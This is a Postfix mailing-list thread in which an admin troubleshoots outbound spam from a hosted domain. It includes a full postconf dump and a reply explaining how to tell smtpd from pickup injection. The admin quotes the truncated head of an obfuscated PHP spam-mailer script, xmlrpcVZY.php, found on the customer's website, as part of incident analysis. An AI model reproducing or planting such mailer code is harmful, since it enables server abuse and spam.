On 10/7/2013 9:10 PM, li...@sbt.net.au wrote: > On Tue, October 8, 2013 11:31 am, Simon B wrote: >> On 8 Oct 2013 01:54, "Voytek" <li...@sbt.net.au> wrote: > >> spam from many.na...@adomain.tld, how best to prevent any outbound mails >> from adomain.tld till I can look at this? > >> Postfix stop >> >> >> Then post your postconf -n and a log snippet of an outgoing spam message. > > Simon, thanks
Without the log entries Simon asked for, we can't do anything more to help you, as we don't know how the spam is being injected. Please provide logging that demonstrates the problem; in particular, the log will show whether the spam enters through smtpd (an SMTP client, possibly SASL-authenticated) or through pickup (the local sendmail command, e.g. called by a web script), and mail submitted locally never passes the smtpd_*_restrictions shown below. > -------------------- > # postconf -n > address_verify_sender = $double_bounce_sender > alias_database = hash:/etc/aliases > alias_maps = hash:/etc/aliases > anvil_rate_time_unit = 1800s > body_checks = pcre:/etc/postfix/body_checks > body_checks_size_limit = 150000 > broken_sasl_auth_clients = yes > command_directory = /usr/sbin > config_directory = /etc/postfix > content_filter = smtp-amavis:[127.0.0.1]:10024 > daemon_directory = /usr/libexec/postfix > debug_peer_level = 2 > disable_vrfy_command = yes > header_checks = pcre:/etc/postfix/header_checks > home_mailbox = Maildir/ > html_directory = /usr/share/doc/postfix-2.4.5-documentation/html > local_recipient_maps = unix:passwd.byname $alias_maps > local_transport = local > mail_owner = postfix > mailq_path = /usr/bin/mailq.postfix > manpage_directory = /usr/share/man > message_size_limit = 15360000 > mime_header_checks = pcre:$config_directory/mime_headers.pcre > mydestination = $myhostname, localhost.$mydomain > myhostname = server.tld > mynetworks = 111.222.333.444 222.333.444.555 127.0.0.1 > myorigin = $mydomain > newaliases_path = /usr/bin/newaliases.postfix > queue_directory = /var/spool/postfix > readme_directory = /usr/share/doc/postfix-2.4.5-documentation/readme > recipient_bcc_maps = hash:/etc/postfix/bcc_r_maps > recipient_delimiter = + > sample_directory = /etc/postfix/samples > sender_bcc_maps = hash:/etc/postfix/bcc_s_maps > sendmail_path = /usr/sbin/sendmail.postfix > setgid_group = postdrop > smtp_tls_cert_file = $smtpd_tls_cert_file > smtp_tls_key_file = $smtpd_tls_key_file > smtp_tls_loglevel = 1 > smtp_tls_note_starttls_offer = yes > smtp_tls_security_level = may > smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache > smtp_tls_session_cache_timeout = 3600s > smtpd_client_connection_rate_limit = 50 
> smtpd_data_restrictions = reject_unauth_pipelining, permit > smtpd_helo_required = yes > smtpd_helo_restrictions = permit_mynetworks, permit_sasl_authenticated, > check_helo_access ${RE}helo.re > smtpd_recipient_restrictions = permit_sasl_authenticated, > permit_mynetworks, reject_unauth_destination, check_recipient_access > hash:/etc/postfix/recipient_no_checks, reject_non_fqdn_sender, > reject_non_fqdn_recipient, reject_invalid_helo_hostname, > reject_non_fqdn_helo_hostname, reject_unknown_sender_domain, > reject_unknown_reverse_client_hostname, reject_unlisted_recipient, > check_sender_access hash:/etc/postfix/freemail_access, > check_recipient_access pcre:/etc/postfix/recipient_checks.pcre, > check_helo_access hash:/etc/postfix/helo_checks, check_sender_access > hash:/etc/postfix/sender_checks, check_client_access > hash:/etc/postfix/client_checks, check_client_access > pcre:/etc/postfix/client_checks.pcre, reject_rbl_client zen.spamhaus.org, > reject_rhsbl_client dbl.spamhaus.org, reject_rhsbl_sender > dbl.spamhaus.org, reject_rbl_client psbl.surriel.com, reject_rbl_client > bl.spamcop.net, reject_rhsbl_sender dsn.rfc-ignorant.org, > check_policy_service inet:127.0.0.1:10031, permit > smtpd_restriction_classes = from_freemail_host > smtpd_sasl_auth_enable = yes > smtpd_sasl_authenticated_header = yes > smtpd_sasl_local_domain = > smtpd_sasl_path = private/auth > smtpd_sasl_security_options = noanonymous > smtpd_sasl_type = dovecot > smtpd_tls_auth_only = yes > smtpd_tls_cert_file = /etc/pki/tls/certs/server.crt > smtpd_tls_key_file = /etc/pki/tls/certs/server.key > smtpd_tls_loglevel = 1 > smtpd_tls_received_header = yes > smtpd_tls_security_level = may > smtpd_tls_session_cache_database = btree:${data_directory}/smtpd_scache > smtpd_tls_session_cache_timeout = 36000s > strict_rfc821_envelopes = yes > tls_random_source = dev:/dev/urandom > transport_maps = hash:/etc/postfix/transport > unknown_local_recipient_reject_code = 550 > virtual_alias_maps = 
proxy:mysql:/etc/postfix/mysql_virtual_alias_maps.cf > virtual_gid_maps = static:5000 > virtual_mailbox_base = /var/mail/vhosts > virtual_mailbox_domains = > proxy:mysql:/etc/postfix/mysql_virtual_domains_maps.cf > virtual_mailbox_limit = $message_size_limit > virtual_mailbox_maps = proxy:mysql:/etc/postfix/mysql_virtual_mailbox_maps.cf > virtual_minimum_uid = 5000 > virtual_transport = lmtp:unix:private/dovecot-lmtp > virtual_uid_maps = static:5000 > > -------------------- > > there is a php script on their web as so, I'm trying to see how it was > uploaded at this point: > > --------------------- > head xmlrpcVZY.php > <?php > @error_reporting(0); @ini_set(chr(101).chr(114).'ror_log',NULL); > @ini_set('log_errors',0); if (count($_POST) < 2) { > die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321)); } $v5031e998 = false; > foreach (array_keys($_POST) as $v3c6e0b8a) { switch ($v3c6e0b8a[0]) { case > chr(108): $vd56b6998 = $v3c6e0b8a; break; case chr(100): $v8d777f38 = > $v3c6e0b8a; break; case chr(109): $v3d26b0b1 = $v3c6e0b8a; break; case > chr(101); $v5031e998 = true; break; } } if ($vd56b6998 === '' || > $v8d777f38 === '') die(PHP_OS.chr(49).chr(49).chr(43).md5(0987654321)); > $v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions')); > $v01b6e203 = @$_POST[$vd56b6998]; $v8d777f38 = @$_POST[$v8d777f38]; > $v3d26b0b1 = @$_POST[$v3d26b0b1]; if ($v5031e998) { $v01b6e203 = > n9a2d8ce3($v01b6e203); $v8d777f38 = n9a2d8ce3($v8d777f38); $v3d26b0b1 = > n9a2d8ce3($v3d26b0b1); } $v01b6e203 = urldecode(stripslashes($v01b6e203)); > $v8d777f38 = urldecode(stripslashes($v8d777f38)); $v3d26b0b1 = > urldecode(stripslashes($v3d26b0b1)); if (strpos($v01b6e203, '#',1) != > false) { $v16a9b63f = preg_split('/#/', $v01b6e203); $ve2942a04 = > count($v16a9b63f); } else { $v16a9b63f[0] = $v01b6e203; $ve2942a04 = 1; } > for ($v865c0c0b=0; $v865c0c0b < $ve2942a04;$v865c0c0b++) { $v01b6e203 = > $v16a9b63f[$v865c0c0b]; if ($v01b6e203 == '' || !strpos($v01b6e203,'@',1)) > continue; 
if (strpos($v01b6e203, ';', 1) != false) { list($va3da707b, > $vbfbb12dc, $v081bde0c) = preg_split('/;/',strtolower($v01b6e203)); > $va3da707b = ucfirst($va3da707b); $vbfbb12dc = ucfirst($vbfbb12dc); > $v3a5939e4 = next(explode('@', $v081bde0c)); if ($vbfbb12dc == '' || > $va3da707b == '') { $vbfbb12dc = $va3da707b = ''; $v01b6e203 = $v081bde0c; > } else { $v01b6e203 = "\"$va3da707b $vbfbb12dc\" <$v081bde0c>"; } } else { > $vbfbb12dc = $va3da707b = ''; $v081bde0c = strtolower($v01b6e203); > $v3a5939e4 = next(explode('@', $v01b6e203)); } > preg_match('|<USER>(.*)</USER>| > snip > --------------------- > > (i wasn't able to include above as I was on 4" mobile screen, sorry) > > >